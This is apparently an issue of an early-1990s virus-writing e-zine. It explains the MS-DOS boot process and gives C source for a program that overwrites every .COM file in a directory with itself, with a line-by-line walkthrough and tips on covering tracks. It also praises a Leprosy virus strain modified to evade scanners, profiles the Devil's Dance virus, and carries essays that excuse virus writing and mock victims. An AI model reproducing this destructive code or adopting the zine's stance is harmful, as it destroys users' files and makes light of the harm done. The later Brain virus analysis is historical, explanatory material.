brand new section of Viriisearch! Here we will discuss hardware +oriented subjects, such as RAM, Machine Cycles, Boot Routines, etc. +----------------------------------------------------------------------------- +This month we will discuss the 'Bootstrap' routine. +----------------------------------------------------------------------------- +Many people turn on their machines, let DOS load and don't think a second +thought about it. Those people also take MS-DOS for granted and don't even +care what it it doing, even though it is the most important piece of software +a IBM user can have. One of my favorite sayings: 'A Computer Without MS-DOS +Is Little More Than A Boat Anchor' + +Here I will tell exactly what MS-DOS does from the second you hit the power +switch up until the time you get the prompt --> C> + +When the system is started or reset, program execution begins at address +0FFFF0H. This is a feature of the 8086/8088 family of microprocessors and +has nothing to do with MS-DOS. Systems based on these processors are design- +ed so that address 0FFFF0H lies with an area of ROM and contains a jump mach- +ine instruction to transfer control to system test code and the ROM bootstrap +routine. + +The ROM bootstrap routines reads the disk bootstrap routine from the first +sector of the system startup disk (the boot sector) into memory at some +arbitrary address and then transfers control to it. (The boot sector also +contains a table of information about the disk format.) + +The disk bootstrap routine checks to see if the disk contains a copy of +MS-DOS. It does this by reading the first sector of the root directory +and determining whether the first two files are IO.SYS and MSDOS.SYS (or +IBMIO.COM and IBMDOS.COM), in that order. If these files are not present, +the user is prompted to change disks and strike any key to try again. If +the two system files are found, the disk bootstrap routine reads them into +memory and transfers control to the initial entry point of IO.SYS. (In some +implementations, the disk bootstrap routine reads only IO.SYS into memory, +and IO.SYS in turn loads the MSDOS.SYS file.) + +The IO.SYS file that is loaded from the disk actually consists of two separ- +ate modules. The first is the BIOS, which contains the linked set of resident +device drivers for the console, auxiliary port, printer, block, and clock de- +vices, plus some hardware specific initialization code that is run only at +system startup. The second module, SYSINIT, is supplied by Microsoft and lin- +ked into the IO.SYS file, along with the BIOS, by the computer manufacturer. + +SYSINIT is called by the manufacturer's BIOS initialization code. It determ- +ines the amount of contiguous memory present in the system and then relocates +itself to high memory. Then it moves the DOS kernel, MSDOS.SYS, from it's or- +iginal load location to it's final memory location, overlaying the original +SYSINIT code and any other expendable initialization code that was contained +in the IO.SYS file. + +Next, SYSINIT calls the initialization code in MSDOS.SYS. The DOS kernel in- +itializes its internal tables and work areas, sets up the interrupt vectors +20H through 2FH, and traces through the linked list of resident device driv- +ers, calling the initialization function for each. These driver functions +determine the equipment status, perform any necessary hardware initialization, +and set up the vectors for any external hardware interrupts the drivers will +service. + +As part of the initialization sequence, the DOS kernel examines the disk par- +ameter blocks returned by the resident block-device drivers, determines the +largest sector size that will be used in the system, builds some drive par- +ameter blocks, and allocates a disk sector buffer. Control then returns to +SYSINIT. + +When the DOS kernel has been initialized and all the resident device drivers +are available, SYSINIT can call on the normal MS-DOS file services to open +the CONFIG.SYS file. This optional file can contain a variety of commands +that enable the user to customize the MS-DOS environment. For instance, the +user can specify additional hardware device drivers, the number of disk buf- +fers, the maximum number of files that can be open at one time, and the file +name of the command processor (shell). + +if it is found, the entire CONFIG.SYS file is loaded into memory for process- +ing. All lowercase characters are converted to uppercase, and the file is in- +terpreted one line at a time to process the commands. Memory is allocated for +the disk buffer cache and the internal file control blocks used by the handle +file and record system functions. Any device drivers indicated in the CONFIG +file are sequentially loaded into memory, initialized by calls to their init +modules, and linked into the device driver list. The init function of each +driver tells SYSINIT how much memory to reserve for that driver. After all +installable device drivers have been loaded, SYSINIT closes all file handles +and reopens the console (CON), printer (PRN), and auxiliary (AUX) devices as +the standard input, standard output, standard error, standard list, and sta- +ndard auxiliary devices. This allows a user-installed character device driver +to override the BIOS's resident drivers for the standard devices. + +Finally, SYSINIT calls the MS-DOS EXEC function to load the command interpr- +eter, or shell. (The default shell is COMMAND.COM, but another shell can be +substituted by means of the CONFIG.SYS file.) Once the shell is loaded, it +looks for AUTOEXEC.BAT, automatically running any internal DOS commands and +external commands inside that file. If it doesn't find AUTOEXEC.BAT it will +ask for the date and time (providing a clock chip isn't present) and then +displays the prompt, waiting for the user to enter a command. MS-DOS is now +ready for business, and SYSINIT is discarded. + +----------------------------------------------------------------------------- + +Sample Source Code Of Virii: +---------------------------- + +----------------------------------------------------------------------------- +This month we will discuss something I have been fooling around with and have +finally completed. It is not a virus, but can be modified and made into one. +What the following code basically does is find all the COM files in the curr- +ent directory, and overwrites them with itself. It's basically a replicating +program. +----------------------------------------------------------------------------- + +#include +#include +#include +#include +#include +#include +#include +#include +FILE *file1,*file2; +int main(void); +main() +{ + long size; + char *code = NULL; + struct find_t com_file; + _dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); + chmod(com_file.name, S_IREAD|S_IWRITE); + file1=fopen("HELLO.EXE","rb"); + file2=fopen(com_file.name,"wb"); + size=filelength(fileno(file1)); + code=malloc(size); + fread(code, size, 1, file1); + fwrite(code, size, 1, file2); + while (_dos_findnext(&com_file) == 0) + { + chmod(com_file.name, S_IREAD|S_IWRITE); + file2=fopen(com_file.name,"wb"); + fwrite(code, size, 1, file2); + } + fcloseall(); + free(code); +} + +----------------------------------------------------------------------------- +Ok, this line: + +_dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); + +finds the first occurence of a COM file with any of the attributes listed. +They are "ORed" together using the | character. It passes the filename to +the "com_file" structure, and references to that file are now: com_file.name + +Upon one being found, it goes onto: + +chmod(com_file.name, S_IREAD|S_IWRITE); + +which changes the attributes of the file found to that it can be written to. + +The next line opens the file you want to replicate in "read binary" mode, that +it what the "rb" switch is for. + +file1=fopen("VIRUS.EXE","rb"); + +Then it opens the first COM file, the 'victim' to be overwritten, in "write +binary" mode (that's what the "wb" is for) + +file2=fopen(com_file.name,"wb"); + +Then it obtains the size of the virus and allocates enough memory for it. + + size=filelength(fileno(file1)); + code=malloc(size); + +Then it reads the virus code into the buffer "code" which is size "size", is +1 item, and is reading it from "file1" + + fread(code, size, 1, file1); + +Then it takes "code" which is size "size", is 1 item, and writes it to "file2" + +fwrite(code, size, 1, file2); + +Once it is done with that, it goes onto the loop: + +while (_dos_findnext(&com_file) == 0) + { + chmod(com_file.name, S_IREAD|S_IWRITE); + file2=fopen(com_file.name,"wb"); + fwrite(code, size, 1, file2); + } + +Both _dos_findfirst() and _dos_findnext return 0 if they are successful at +finding the specified file, so basicall this loop is saying: + +"keep going as long as _dos_findnext(&com_file)) equals 0" + +What it does every time it passes through the loop (i.e. - finds a COM file): + +changes the mode of the file so it can be written to, opens that file in +"write binary" mode, and writes the virus code to it. + +When there are no more COM files found, the loop is done and it goes onto the +next part of the program: + +fcloseall(); +free(code); +} + +it closes all open files associated with this program, releases the previous- +ly allocated memory for the virus code, and exits. +----------------------------------------------------------------------------- +NOTES: + +This is kind of slow but is somewhat faster than the example in issue #2 that +truncated files to 0 bytes. You can also fool around with getting and setting the file's +date and time, and changing it's size back to what it was originally to cover +your tracks. + +----------------------------------------------------------------------------- +Suicidal Tendencies Dept/Virus Of The Month: +----------------------------------------------------------------------------- +The virus of the award month goes to: Leprosy (C Strain) +----------------------------------------------------------------------------- +NOTE: This is actually Leprosy - B Strain , but modified by TBSI so McAffee's +scanner wouldn't find it. Originally written by PCM2 in August of 1990. +Modified by TBSI in June of 1991. + +PCM2, The person who wrote this, and all other strains of Leprosy, did a real +nice job with this one. I placed the file, LEPROSYC.COM, on a 5.25 360K +floppy in drive B and this is what was on the disk: + + Volume in drive B has no label + Directory of B:\ + + COMMAND COM 47845 04-09-91 5:00a + ANSI SYS 9029 04-09-91 5:00a + RAMDRIVE SYS 5873 04-09-91 5:00a + CONFIG SYS 39 01-01-80 12:35a + SYS COM 13440 04-09-91 5:00a + NDOS COM 2419 08-14-84 12:00p + MEM EXE 39818 04-09-91 5:00a + DEBUG EXE 21692 06-07-90 2:24a + AUTOEXEC BAT 69 01-01-80 3:37a + PKUNZIP EXE 23528 03-15-90 1:10a + LEPROSYC COM 666 06-05-91 12:36a + 11 file(s) 164418 bytes + 192512 bytes free + +This is BEFORE I ran the virus...this is after: + + Volume in drive B has no label + Directory of B:\ + + COMMAND COM 47845 04-09-91 5:00a + ANSI SYS 9029 04-09-91 5:00a + RAMDRIVE SYS 5873 04-09-91 5:00a + CONFIG SYS 39 01-01-80 12:35a + SYS COM 13440 04-09-91 5:00a + NDOS COM 2419 08-14-84 12:00p + MEM EXE 39818 04-09-91 5:00a + DEBUG EXE 21692 06-07-90 2:24a + AUTOEXEC BAT 69 01-01-80 3:37a + PKUNZIP EXE 23528 03-15-90 1:10a + LEPROSYC COM 666 06-05-91 12:36a + 11 file(s) 164418 bytes + 192512 bytes free + +There is not one single difference with any of the files, yet EVERY .EXE and +.COM file on the disk was infected. No changes in size, no date/time changes. +Well, the dates and times did change but the virus preserves the original date +and time stamps, restoring them once the infection is complete. But no changes +in file sizes.....this virus was very well written. It was fast, efficient, +and very small in size. The source code to this particular virus is 16664 +bytes, and, as you can see, the .COM file is only 666 bytes. This is what the +virus did when run: It accessed drive B for a few seconds, and gave me the +error message: Program too big to fit into memory. I did not notice any +changes at all so I assumed it didn't infect any of the files, but when I ran +each .EXE and .COM file on the disk, they all gave me that error message... +'Program too big to fit into memory' so I assume they all were infected. +The program is actually supposed to give me this message when it is done: + + + ATTENTION! Your computer has been afflicted with + the incurable decay that is the fate wrought by + Leprosy Strain B, a virus employing Cybernetic + Mutation Technology(tm) and invented by PCM2 08/90. + +For some reason it did not display this message. Perhaps there is a certain +amount of files it must infect before it displays it. I did not take too +good of a look at the source to determine this. All in all a very nicely +written virus, does it's job fast and very efficiently. +----------------------------------------------------------------------------- + + +Virus Info: +----------- + +----------------------------------------------------------------------------- +Welcome to a brand new section of Viriisearch! In this section we will give +valuable information on a virus, such as origin, aliases, etc. Some of the +info presented here is taken from the file: MSDOS.ZIP, a index of DOS virii. +Other info presented was supplied by me, such as the scan string, name of +virus author, etc. +----------------------------------------------------------------------------- +Virus Spotlight This Month Will Cover: The Devil's Dance Virus +***************************************************************************** +Name Of Virus: The Devil's Dance Virus + +Virus Aliases: Devil/941 Virus + +Name Of Virus Author: N/A + +Language Virus Was Written In: N/A + +Date Virus Was First Discovered Or Originated: Spring of 1990 + +Place Virus Was First Discovered Or Originated: Mexico City + +Scan String: +0L0G0M0H0G1U0G0R0HBK2MDY3Y0G0G4MCU0G2LDG1Y4LCU0G2L0G2MBR4SDNFLDN8H3XFW4XBW5U0 +G2L1WDNFGFM0H0JBR0G0Q6MAV0G0M6GFK0G0MBV7W0G0M6GFK0G0M7Z0G0M9SEJBZ1L0G0M5S0G2L +1L0G0M1L0G0MEW0G0MBR0M0MAW4Q0K0G0G + +Checksum: CF3C + +Hooked Interrupts: INT 21H, functions 4B00H and 49H, INT 09H + + +Trigger: Upon INT 21H, function 4B00H, being called, the .COM file will be + infected. Also, if you hit the CTRL-ALT-DEL sequence anytime after + typing a total of 2,500 characters, the first sector of drive C will + be overwritten. + +Identification: If you do a hexadecimal dump of the virus, the following: + + "Drk" & "*.com" + + should be seen in the code. + + Also, the time and date of the infected file is set to the + time and date of infection. + + If you rest the system by pressing CTRL-ALT-DEL, the virus + will display the following message: + + + "Have you ever danced with" + "the devil under the weak light of the moon?" + "Pray for your disk! The_Joker..." + "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". + + If your monitor/card supports color, all characters typed + will be in a different color. + + +Size & Name Of Original Virus EXE/COM File: N/A + +Techniques Used: All file attributes are removed and the following message is + encrypted: + + "Have you ever danced with" + "the devil under the weak light of the moon?" + "Pray for your disk! The_Joker..." + "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". + + +What It Attacks: + +.COM Files: Yes + +.EXE Files: No + +COMMAND.COM: Yes (If in the current directory when virus is first run, or if + COMMAND.COM is run) + +Boot Sector: No + +File Allocation Table (FAT): No + +Fixed Disk Partition Table: No + +Note: The Boot Sector, FAT, or Fixed Disk Partition Table MAY be attacked if + any of them reside on the first sector of drive C because the virus + does attack that part of the drive. (See Damage Report) + +It depends on your drive and what resides in the first sector. + +Change In Size/Date/Time Of Infected File: 941 bytes, Date & Time Is Changed + According To The System's Date And + Time At The Time Of Infection. + +Virus Volume Label: None + +Known Number Of Strain(s): None + +Damage : When the virus is first run, it will infect ALL the .COM + files in the current directory. After pressing 2,500 keys, + if you should reset the system by pressing CTRL-ALT-DEL, the + virus will overwrite the first sector of drive C. Also, any + .COM file you run will be infected. If the .COM file infected + is bigger than 64,337 bytes, it will not run correctly after + being infected. + +***************************************************************************** +--------- +Articles: +--------- + + **************************** + * Unique Virii Names/Ideas * + **************************** + + +I was looking at some virii names recently, and I noticed that a few of them +are pretty stupid...like 'Fuck you' or 'Fuck Me' or 'Phuck'....it does not +take too much intelligence to think up these names so that's why I decided +to include this article in this month's Viriisearch and here are some +virii names and ideas that I thought of: +----------------------------------------------------------------------------- +Stolichnaya - Maybe we could have this one display a picture of Kitty Dukakis + as it deletes your files or trashes your hard drive. + +Valhalla - For those of you who don't know, Valhalla is the Viking Heaven. + To be honest, I didn't really put much thought into what this + would do as a virus.....I just like the name and though it + might be a cool name for a virus. + +Red Sector A - This is a song by Canadian Power Trio, Rush. Perhaps this can + overwrite the boot sector with the lyrics to the song. Maybe + have it pick randomly from a list of tour dates from the 'Roll + the bones' tour as it's trigger date. + +4th Of July - We have virii for Christmas, Columbus Day, etc....but I have + not seen one called 4th Of July....so here we are... + +Blizzard - We could have this annoy the user with random 'snow' on the + monitor which gradually gets worse and worse until you can no + longer see the screen. While it is doing that and flashing + fake error messages, it can eat some files or encrypt the file + allocation table or something. We can also have it's trigger + date as the date that the Blizzard of '78 hit... + +***************************************************************************** + + ******************************** + * Assembly vs C Language Virii * + ******************************** + + +Most C language functions are written in Assembly, so some consider C a +modified Assembly language....and some also claim that a well written C +program is almost as fast as Assembly. This may be true, but when it comes +to writing a virus, I say Assembly is the winner hands down. Earlier we had +discussed the "Leprosy-B" virus. The Assembly source code to that virus is +16664 bytes and the .COM is a remarkable 666 bytes. If I tried to write that +virus in C language, the smallest I could get the .COM or .EXE file would be +about 8 kilobytes if I was lucky. In a previous issue, we discussed my ATTRB +program which is about 3K in source, and a 9K executable, and that is really +good for C language...here we have a .COM file smaller than the source code. +Well over 20% smaller. + +***************************************************************************** + + ********************************* + * My Profile Of A Virus Writer * + * And My Views On The Virus Law * + ********************************* + + +A lot of people may wonder why someone would want to write a virus. Some +people believe it's a former employee wanting revenge against his company. +Others believe that it's a personal vendetta against a fellow computer user +or the sysop of a BBS, or a student wishing to piss his teacher off. Some or +all of these may be true, but I personally believe that one person cannot +possibly mad at all of the computer society. So, why would someone want to +write a virus? Well, Phalcon/Skism (Canada) claim they do it to 'make the +lives of the anti-viral people a living hell' so there's one reason. I also +believe they do it because THEY CAN. That's it. They do it because they know +how. I don't see the average virus writer as a basket case genius egomaniac +as a lot of people do, I see them as a ordinary every day person with very +good programming abilities and nothing more. I do not sympathize with any +person that gets hit by a virus, either. I sit there and laugh alongside the +person who wrote the virus. Sound cruel? Well, I have my reasons. People know +they exist, and all the information they need to protect themselves and +prevent virus attacks is all right there for the taking. Not just in the +underground so there is no excuse why these people cannot obtain these +materials....If you take the proper precautions and steps, a virus attack +will never happen on your machine and if a real intelligent one comes along +that is able to sneak by a virus scanner and/or disable a virus scanner's +method(s) of scanning, and your hard drive is wiped clean, that's what back +ups are for. If you are one of those people who don't want to take the time +to backup, or think backing up is 'for wimps' (as someone had said once - I +am not sure if they were serious or not) when you lose everything just bend +over and kiss your sorry ass goodbye. Anyway, back to the topic of this art- +icle: Why would someone want to write a virus? I already covered some of the +reason why one would want to do this, and covered my reason why they do it. +The average virus writer writes his virus in the hopes some sap doesn't listen +to all the warnings and runs software downloaded from a BBS without scanning +it for a known virus first and gets hit by it. Then he sits there and laughs +his ass off. And I don't blame him. And as for all this law bullshit about +computer virii (The Computer Fraud And Abuse Act Of 1986) I have to laugh +about that, too....I don't really see computer virii as a major threat to +much of anything. It all depends on how you look at it I suppose. I see it +this way: A favorite book of yours gets stolen or destroyed. You have another +copy of it. Do you care about the stolen/destroyed one? Yes, slightly, but +not as much if the stolen/destroyed one had been your only copy. Same with +software. That's why I think the law(s) concerning virii is ridiculous. Now +only if they put that much effort into more serious crimes, like murder, rape +and drugs. In the article earlier, they mentioned a sentence of five years +in jail and a $250,000 fine...for what? Contaminating some bureacrats PC and +destroying his list of drugs growing in his backyard? And look at Robert T. +Morris Jr. He found a loophole in ARPANET, wrote and released a worm that +hogged all the memory and forced thousands of machines to be shut down for +up to ten days or so. So what? Did he deserve what they gave him? He was +thrown out of school, forced to pay $10,000 in fines, perform 400 hours of +community services, and was on 3 years probation. I do not agree with this +at all whatsoever. The reason why he got such a stiff sentence for such a +minor crime, if you can call it a crime at all, is because the government +had a interest in the network Morris interrupted. Morris didn't even have +malicious intent. They should be glad that HE, and not someone else who might +have had malicious destruction in mind, showed them the security loopholes in +the system. Instead they fine him, make him do community services (which was +probably cleaning some rich bureacrats pool or trimming his lawn) and place +him on 3 years probation hoping he fucked up again so they could make more +money and wouldn't have to worry about their lawns or pools for another few +weeks. + +***************************************************************************** + + ******************************* + * Are Virii Really A Problem? * + * And For Who? * + ******************************* + +This is a question I present to the bureacrats and lawmakers: Are virii a +REAL problem? And for who are they a problem? I think they are blowing the +whole thing way out of proportion and making people into criminals who are +not criminals. Let's say you rip out asbestos for a living, and you get +sick from it. Would you call the person that makes the asbestos a criminal? +No, of course not. Asbestos is just a hazard of the job. If your job deals +with computers, consider computer virii as just a hazard of the job. It's a +chance you take. If you don't want to take the risk, either find another +career or take the proper precautions to prevent a virus attack. Just like +the person who works with asbestos every day, he wears a mask, and gloves so +he doesn't get sick. So equip yourself with a real good scanner, be real +careful about where and who you get your software from and stop calling the +people who write virii 'criminals' and treating them like they are. Or if you +are too damn lazy to take the proper precautions, just have a backup at all +times. Should you get attacked by a virus, clean up the computer and install +everything again. I am, of course, referring to personal PCs...and not main- +frames, or networks....this is what I have to say about them: If Internet or +NASA's network should get attacked and disabled again, I say the institutions +and people who pay to use those networks should sue NASA or the people who +run Internet because they are the real criminals for not taking steps to make +sure this didn't happen again. It's kind of like this: If you left your front +door open with a $800 VCR and a $500 TV clearly in view, do you think it would +still be there when you got home? No, of course not, so you lock your door and +equip your home with a expensive alarm system. Why these people who scream +computer crime every time their system gets attacked don't have more secure +systems is beyond me. Instead of crying for anti-virus laws they should spend +more time making the security on their network or mainframe even tighter. The +answer to the question 'Are virii a REAL problem?' is NO....at least to me. +People make into a problem. 'A problem for who?' Lazy virus illiterate people +who don't know any better....that don't bother securing their systems. To me +that's their own damn fault and THEY should be brought up on charges. Maybe +we should have a new law...'The virus ignorance law' + +Section 51-A Of The 1986 Computer Fraud And Abuse Act Of 1986 Clearly States +That You, If Found Guilty Of Virus Ignorance, Could Be Sentenced To Up To 5 +Years In Jail, $500,000 In Fines, 800 Hours Of Cleaning Virus Ridden Computers +And 2 Years Probation. + +After all, wouldn't you consider sitting there with your head firmly wedged +up your ass as your computer gets invaded by a virus, computer abuse? + +I do. + +***************************************************************************** + +This one is for Midnight Cowboy. + +This was taken from a book and re-printed WITHOUT permission from the author. + +***************************************************************************** + + ******************************* + * The Brain Virus: Fact And * + * Fantasy * + ******************************* + +The Brain virus has the distinction of being the first computer virus +to strike in the United States outside of a test laboratory. According +to Ms. Ann Webster of the Academic Computer Center of the University of +Delaware in Newark, Delaware, it was reported to the Computer Center on +October 22, 1987. It was found in other locations on the campus one or +two days later. It was named the Brain virus because it wrote that word +as the disk label on any floppy disk it attacked. After the initial an- +alysis of this computer virus on an infected disk two names, Basit and +Amjad, and their address in Lehore, Pakistan, was found. Because of this, +the virus has also been called the Pakistani virus. Many misconceptions +exist about this virus because of incomplete and/or inaccurate statements +that appeared in newspapers. Most of the newspaper and popular magazine +writers did not have any computer knowledge and some were eager to seek +"horror stories: so that their articles would be different. Even the co- +mputer trade and professional publications have included errors in their +accounts of this virus. Some of the professional writers, both in the US +and abroad, based their articles on previously published information. Most +did not have a working copy of the Brain and even the few who did, failed +to fully analyze the actual programs code. In our Microcomputer Security +Laboratory we have several copies of the Brain virus obtained from diff- +erent sources. We have spent many hours running the Brain virus, explor- +ing it's different methods of infection, testing it's interaction with +different media and isolating the virus so that we could produce an as- +sembly language listing. We have also discussed its code and infection +methodology with virus researchers. Therefore we hope to clear up some +current confusion. + +Some Characteristics of the Brain +---------------------------------- + +1. The brain has been called benign in the press. Yet, Ms. Webster reported + that the files on a number of infected disks were destroyed. The virus + at times was destructive. It is impossible to be both. This oxymoron can + be explained by the fact that the virus may remain on the floppy disk + without doing any damage. But at times it has been activated so that it + destroys the file allocation table (FAT) that provides information to the + operating system as to the location of all files on the disk. It would be + stretching the dictionary meaning of benign to say that because the cont- + ents of the disk can be reconstructed, no damage has been done. To under- + stand the reconstruction problem, suppose we have a set of 30 company re- + ports, approximately 20 pages each, all typed within the same margins on + the same paper, not page numbered, not clipped, and with no other copy + available. Left near an open window, these 600 pages are blown over a + wide area with no order preserved. Now, put them back in order. Because + the actual data on the floppy disk have not been destroyed, it is poss- + ible to use a utility, such as PC Tools, or the Norton Utilities, to read + each sector. The appropriate sectors can be moved to another disk in an + approximate sequence to replicate the original documents. This is a del- + icate and tiresome task. + +2. The Brain virus does not notify the user that the disk has been infected + immediately before it ruins a disk. The user is never made aware that the + disk has been infected. The virus can remain on an infected disk without + damaging it, but there is always a risk of unannounced disaster. + +3. There is NO ransom demand made by the Brain (See Note 1). + +4. The Brain virus code is written so that it will never infect a hard disk. + It is media specific; it will attack only double-sided, nine sectored + floppy disks that have been formatted under some version of DOS. + +5. The virus can infect a microcomputer and spread to floppy disks even if + the boot disk is NOT infected. If a non-bootable infected disk is used + in an attempt to boot a system, the following message will be displayed + on the screen: + + Please Insert A Bootable Disk + The Type [Return] + + By that time the virus has already hidden itself in RAM memory. Using a + clean bootable disk to start the system will result in that disk becom- + ing infected. (See Note 2). The virus will then spread to any other fl- + oppy used on the system. + +6. The virus appears to be unstable. The actual code is some 4100 bytes but + less than half of it is actually executed. Two portions of the program + are neither called nor can many researchers determine under what circum- + stances they would be executed. Was the extra code inserted to confuse + any one who disassembled the program? Is there some what that either or + both uncalled parts are involved that has thus far been undiscovered? + +7. The virus source code contains a counter. The counter is reset often and + it is difficult to determine it's purpose. Because the counter was not + mentioned in published reports about the Brain, "new" viruses appeared. + Some companies whose disks were attacked discovered the counter and de- + cided that they had a new virus. When similarities to the Brain were + found it was decided that the new viruses were hacker versions of the + original found at the University of Delaware. Whether there are hacker + versions or destruction was caused by the unstable character of the Brain + is a question. Certainly it is not difficult for an experienced program- + mer who has obtained a copy of the Brain to modify it's code. + +Note 1: In the January 31, 1988, issue of The New York Times, the article + about computer viruses contained the following: "Buried within the + code of the virus discovered at the University of Delaware was an + apparent ransom demand: Computer users who discovered the virus were + told to send $2,000 to an address in Pakistan to obtain an immunity + program, according to Harold Highland....The Pakistani contact was + not identified." This statement was never made by me and Vin McLellan + and the author of The New York Times article admits that it was never + made. Somewhere in the copy preparation and/or editing, the copy was + altered. In our discussion, I noted that the names of the authors and + their addresses in Lahore, Pakistan, were found in the virus and that + there was even a copyright notice. Because of other writers use of the + database of newspaper articles about viruses, several picked this qu- + ote up and used it without any verification. It has appeared in seve- + ral major newspapers in the States as well as in newspapers and the + computer trade press abroad. + +Note 2: This note is my own, and was not in the original article. I noticed + that the author of this article had said that other articles releas- + ed on the Brain virus had errors in them. I also noticed that his + article had an error in it, too. He said: + + By that time the virus has already hidden itself in RAM memory. Using a + clean bootable disk to start the system will result in that disk becom- + ing infected. (See Note 2). The virus will then spread to any other fl- + oppy used on the system. + + Now, this is not possible. If you do a "warm boot" the virus may be + able to survive and infect that clean bootable disk. BUT if you do + a "cold boot" and wait fifteen seconds before you turn the machine + back on, there is no possible way for the virus to infect that disk. + Once you shut the machine off, RAM is empty. NOTHING can possibly + survive in RAM after the machine has been shut off. Even if you did + do a warm boot, and the virus survived, just have that clean boot + disk write protected and the virus won't be able to infect it. + + +How The Virus Infects A Disk +----------------------------- + +When a Brain infected disk is inserted into a system, the virus first copies +itself to the highest area in memory. It resets the memory size by altering +interrupt vector A2H so as to protect the RAM resident virus. It also resets +interrupt vector 13H to point to the virus code in high memory and resets +interrupt vector 6H (unused under existing versions of DOS) to point to the +original interrupt vector, 13H. After the normal boot process is continued +with the loading of both IBMIO.COM and IBMDOS.COM under PC-DOS or IO.SYS and +MSDOS.SYS under MS-DOS. The infected disk contains a message and part of the +virus code in the boot sector. The remainder of the code and a copy of the +original boot sector is contained in three clusters (six sectors) that the +virus has labeled "bad" in the FAT. Figure 1 shows a map of an infected disk +obtained by using Central Point Software's PC Tools Deluxe. + +Figure 1: + +----------------------------------------------------------------------------- +Entire Disk Mapped 80% free space + Track 1 1 2 2 3 3 3 +Double Sided 0 5 0 5 0 5 0 5 9 + Booooo.....+++++++++++++++++++++++++++++++ + Side 0 Fooooo.....+++++++++++++++++++++++++++++++ + Fooooo..X..+++++++++++++++++++++++++++++++ + Doooooo.X..+++++++++++++++++++++++++++++++ + -----------Doooooo.X..+++++++++++++++++++++++++++++++ + Dooooo.....+++++++++++++++++++++++++++++++ + Side 1 oooooo.....+++++++++++++++++++++++++++++++ + oooooo.....+++++++++++++++++++++++++++++++ + oooooo.....+++++++++++++++++++++++++++++++ + + + Explanation Of Codes: + + + Available . Allocated + B Boot Record o Hidden + F File Alloc. Table r Read Only + D Directory X Bad Cluster + +----------------------------------------------------------------------------- + +With the virus in upper RAM it is not possible to read the infected boot +sector. If an attempt is made to read the boot sector, the Brain re-directs +the request to read the original boot sector that is stored in one of the +bad sectors. The only way tp read the Brain message contained in the boot +sector, is to boot a system with a non-infected disk, preferably with a write +protect tab. Replace the boot disk with a write protected version of PC Tools +and place an infected disk in drive B. Figure 2 shows the embedded message by +using PC Tools to read the infected disk's boot sector. + +Figure 2: + +----------------------------------------------------------------------------- + +Displacement -----------------HEX Values-------------------- ASCII Value +0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F Welcome to +0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 the Dungeon +0048 (0030) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 +0064 (0040) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 +0080 (0050) 20 28 63 29 20 31 39 38 36 20 42 61 73 69 74 20 (C) 1986 Basit +0096 (0060) 26 20 41 6D 6A 61 64 20 28 70 76 74 29 20 4C 74 & Amjad (pvt) Lt +0112 (0070) 64 2E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 d +0128 (0080) 20 42 52 41 49 4E 20 43 4F 4D 50 55 54 45 52 20 BRAIN COMPUTER +0144 (0090) 53 45 52 56 49 43 45 53 2E 2E 37 33 30 20 4E 49 SERVICES 730 NI +0160 (00A0) 54 41 4D 20 42 4C 4F 43 4B 20 41 4C 4C 41 4D 41 ZAM BLOCK ALLAMA +0176 (00B0) 20 49 51 42 41 4C 20 54 4F 57 4E 20 20 20 20 20 IGBAL TOWN +0192 (00C0) 20 20 20 20 20 20 20 20 20 20 20 4C 41 48 4F 52 LAHOR +0208 (00D0) 45 2D 50 41 4B 49 53 54 41 4E 2E 2E 50 48 4F 4E E-PAKISTAN PHON +0224 (00E0) 45 20 3A 34 33 30 37 39 31 2C 34 34 33 32 34 38 E 430791.443248 +0240 (00F0) 2C 32 38 30 35 33 30 2E 20 20 20 20 20 20 20 20 .280530 +0256 (0100) 20 20 42 65 77 61 72 65 20 6F 66 20 74 68 69 73 Beware of this +0272 (0110) 20 56 49 52 55 53 2E 2E 2E 2E 2E 43 6F 6E 74 61 VIRUS.....Conta +0288 (0120) 63 74 20 75 73 20 66 6F 72 20 76 61 63 63 69 6E ct us for vaccin +0304 (0130) 61 74 69 6F 6E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E ation....... + +----------------------------------------------------------------------------- + +The virus, residing in high memory, interrupts and disk READ request. If that +request is not for the boot sector or non-floppy drive, the virus reads the +boot sector of the disk. It examines the 4th and 5th bytes for "1234" that are +stored as 34 12, the signature of the Brain. If that signature is not present +on the floppy disk, the virus infects the disk then proceeds with the READ +command. If the disk is already infected, the virus does not re-infect the +disk but instead continues with the READ. Also if the disk is write protected, +the infection will be terminated. Figure 3 is a comparison of the initial po- +rtion of a good and an infected boot sector. + +Figure 3: + +----------------------------------------------------------------------------- + +GOOD Boot Sector: + +Displacement -----------------HEX Values-------------------- +0000 (0000) EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 +0016 (0010) 02 70 00 D0 02 FD 02 00 09 00 02 00 00 00 00 00 +0032 (0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + +BAD Boot Sector: + +Displacement -----------------HEX Values-------------------- +0000 (0000) FA E9 4A 01 34 12 01 02 27 00 01 00 00 00 00 20 +0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F +0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 + +----------------------------------------------------------------------------- + +Normally the virus, in its attempt to infect a disk, will search for three +consecutive clusters it can mark as "bad". If there are no blank clusters, the +virus will not infect the disk. However, if there is only one blank cluster +and it is neither of the last two clusters on the disk, the virus will select +the one blank cluster and overwrite the next two clusters and mark all three +as bad. If the overwritten material is part of a file, that file no longer can +be executed if it is a program, or read if it is a data file. This is one way +in which a user might learn that a disk has been infected. + +Poor Man's Filter +----------------- + +In our laboratory testing we found a simple, inexpensive method to protect a +disk from becoming infected by the Brain virus by checking if the virus is in +high memory. It is possible to prepare a test disk by following these simple +steps. + +1. Format a floppy disk with or without a system. + +2. Use DEBUG.COM or PC Tools to edit the boot sector. The first line of the + boot sector appears as: + + EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 + ----- + 